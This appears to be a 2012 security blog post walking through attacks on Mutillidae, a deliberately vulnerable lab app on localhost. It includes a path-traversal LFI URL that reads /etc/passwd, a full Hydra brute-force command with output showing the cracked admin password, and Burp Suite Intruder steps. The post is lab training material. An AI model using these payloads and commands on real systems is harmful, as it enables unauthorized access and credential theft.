Comments

Pages

Wednesday, 12 September 2012

Brute Force and LFI on Mutillidae

Posted by at 23:05 Read our previous post
After installing Mutillidae, now I will try to attact it using Brute Force and LFI method.

LFI (Local File Inclusion)

  1. Open mutillidae from browser, you will see url bellow:
    http://localhost/mutillidae/index.php?page=home.php
  2. The uri above "?page=home.php" indicate that this application try to read some file in local server. We can try to read other file in system, for example /etc/passwd
    http://localhost/mutillidae/index.php?page=../../../../../../etc/passwd
  3. Wow, can you see that

Brute Force
  1. Run your Hydra within this command:
    Usage
    hydra -> the progam name
    -l -> the username
    -P -> the wordlists
    127.0.0.1 -> your target host, it can be change using domain
    http-post-form -> the service module
    "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

    /mutillidae/index.php?page=login.php -> path application
    username -> input form
    password -> input form
    login-php-submit-button -> input form at submit button
    Not Logged In -> error message when the application failed to log in
    2. Run this command
    hydra -l admin -P pass.txt 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
  2. Ok, the password found

    Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-09-15 12:51:15
[DATA] 8 tasks, 1 server, 8 login tries (l:1/p:8), ~1 try per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: adminpass
[STATUS] attack finished for 127.0.0.1 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-09-15 12:51:16
    3. "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
    Please note that you must be carefull when giving error report for hydra, If you giving it wrong you never get the password although the correct password available in your wordlist. 

     By the way, I will try to attack brute force using Burp Suite.
    1. We need to configure network of our browser, in this case I assuming using firefox.
    2. Clik Edit->Preferences->Select Advanced Tab->Select Network->Setting.
      Host : 127.0.0.1
      Port : 8080
    3. Open Burp Suite, Start menu->Backtrack->Vulnerability Assesment->Web Vulnerabilty Assesment->Web Application Proxies->Burp Suite
    4. Goto Proxy tab->Intercept tab and make sure that "intercept" is on
    5. Go back into Firefox, open login page of Mutillidae
      6. http://localhost/mutillidae/index.php?page=login.php
    6. You will see the Burp Suite blinking at the taskbar
    7. Go to Burp Suite window
    8. Click forward button
    9. Goto Mutillidae login page and fill username and password random (test only)
      for example I'm using user:pass and then click login. You will see burp suite blinking. Go back into burp suite window.
    10. Click right on the raw column and select "send to intruder"
    11. Go to Intruder tab,
      Block some text and click clear
      Select "Culster Bomb" for attack type


    12. Still on Intruder tab, select Payload tab
      Select "1" at payload type, and add a username (you can add more than one username)
      Select "2" at payload set, and add lists of random password
    13. Go to Burp Suite menu, select Intruder->Start Attack, and wait for brute force.
      If username and password cracked, you will see the result look like this...

Posted by shinigami at
Labels: , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template